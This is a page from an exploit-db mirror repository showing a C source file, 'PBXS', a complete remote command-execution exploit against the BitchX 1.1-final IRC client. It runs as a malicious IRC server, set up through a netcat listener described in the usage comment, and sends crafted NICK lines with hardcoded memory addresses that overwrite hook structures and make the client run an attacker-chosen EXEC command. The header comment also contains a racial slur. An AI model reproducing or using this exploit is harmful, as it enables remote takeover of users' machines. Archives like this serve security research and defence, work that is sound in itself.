bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/linux/remote/4087.c
Offensive Security 477bcbdcc0 DB: 2016-03-17 
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00

158 lines
3.8 KiB
C
Executable file
Raw Blame History

/* Name: PBXS - Pointless BitchX Sploit
* Author: clarity_
* Infected Versions: 1.1-final and others?
* Synopsis: BitchX suffers from a unchecked bounds in a hash table in hook.c where one
* can inject data structures allowing for the remote execution of commands!
* Usage: Execute "gcc -o pbxs pbxs.c; ./pbxs ps -aux | nc -l -p 6667" Now when the vuln bitchx
* version connects to the mischievous server "ps -aux" will be executed.
* Shout Outs: solomon, crypt1, vortek, ziri, and all the other niggaz at svun @ undernet
*/
// Addresses for BitchX-1.1-final-linux.tar.gz avail on ftp.bitchx.org
#define HOOK_FUNCTIONS 0x81366e0
#define NICKNAME 0x8155353
#define STAR 0x8108f34
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#define NICK_STR ":bleh!i"
#define NICK_STR2 "@svun.powns.net NICK :"
#define EXEC_STR "EXEC $1-"
#define RAW_FMT_STR ":my_server -%u bleh :%s"
typedef struct {
unsigned int hook_functions,
nickname,
star;
unsigned int base, diff, offset;
} Addresses;
/* Partial structs full struct w/ correct values found in include/struct.h */
// To be loaded into nickname static
typedef struct {
unsigned int name; // point to hook
unsigned int list;
// EXEC $1- 2 words
} HookFunc;
// To be loaded into joined_nick static
typedef struct {
// unsigned int next; /* struct hook_stru *next; */
unsigned int nick; /* char *nick; */ //star
unsigned int stuff; /* char *stuff; */
unsigned int shit;
} Hook;
char * make_nickname(Addresses *addrs, int X, int Y) {
char *tmp = NULL, *sp = NULL;
int i;
HookFunc h;
Hook hk;
// malloc
tmp = (char *) malloc(1024);
// BASE
h.name = addrs->star;
h.list = addrs->base - addrs->diff - 4;
if (Y) {
// start loading string
if (X == 4) {
strcpy(tmp, NICK_STR);
}
else {
strcpy(tmp, ":");
strcat(tmp, make_nickname(addrs, X + 1, 0));
strcat(tmp, "!i");
}
sp = tmp + strlen(tmp); // point to char after tmp
//*sp++ = '0' + X;
strcpy(sp, NICK_STR2);
}
else {
sp = tmp;
*tmp = '\0';
}
hk.nick = addrs->star;
hk.stuff = addrs->base + 8; // "stuff" is loaded after the nick
// load str
sp = tmp + strlen(tmp); // point to char after tmp
memcpy(sp, &hk, sizeof(Hook));
sp += sizeof(Hook) - 4;
if (X != 4) {
while (X--) {
*sp++ = 'X';
}
*sp++ = '\0';
return tmp;
}
else {
while (X--) {
*sp++ = 'X';
}
}
// pad
if (sizeof(Hook) > addrs->diff) {
printf("!!!!!!!!!!!!!ERRRRRRRRRRRRROOOOOOOOOOOOOOOOORRRRRRRRRRRRRRRRRR: %d\n", addrs->diff);
}
for (i = sizeof(Hook); i < addrs->diff; ++i)
*sp++ = 'x';
memcpy(sp, &h, sizeof(HookFunc));
sp += sizeof(HookFunc);
memcpy(sp, EXEC_STR, strlen(EXEC_STR));
--sp[4];
sp += strlen(EXEC_STR);
*++sp = '\0';
return tmp;
}
//#define RAW_FMT_STR ":my_server %d bleh :%s"
char * make_raw(Addresses *addrs, char *cmd) {
char *tmp = NULL;
unsigned int len;
len = 2000; // fix later
tmp = (char *) malloc(len);
sprintf(tmp, RAW_FMT_STR, addrs->offset, cmd);
return tmp;
}
int main(int argc, char **argv) {
Addresses addrs;
char *cmd = argv[1];
addrs.hook_functions = HOOK_FUNCTIONS;
addrs.nickname = NICKNAME;
addrs.star = STAR;
addrs.offset = ((NICKNAME - HOOK_FUNCTIONS) / 20) + 1;
addrs.diff = 20 - ((NICKNAME - HOOK_FUNCTIONS) % 20);
addrs.base = NICKNAME + addrs.diff;
printf(":my_server 001 bleh :a\n");
printf("%s\n", make_nickname(&addrs, 4, 1));
printf("%s\n", make_nickname(&addrs, 3, 1));
printf("%s\n", make_nickname(&addrs, 2, 1));
printf("%s\n", make_nickname(&addrs, 1, 1));
printf("%s\n", make_nickname(&addrs, 0, 1));
printf("%s\n", make_raw(&addrs, cmd));
return 0;
}
// milw0rm.com [2007-06-21]
Reference in a new issue View git blame Copy permalink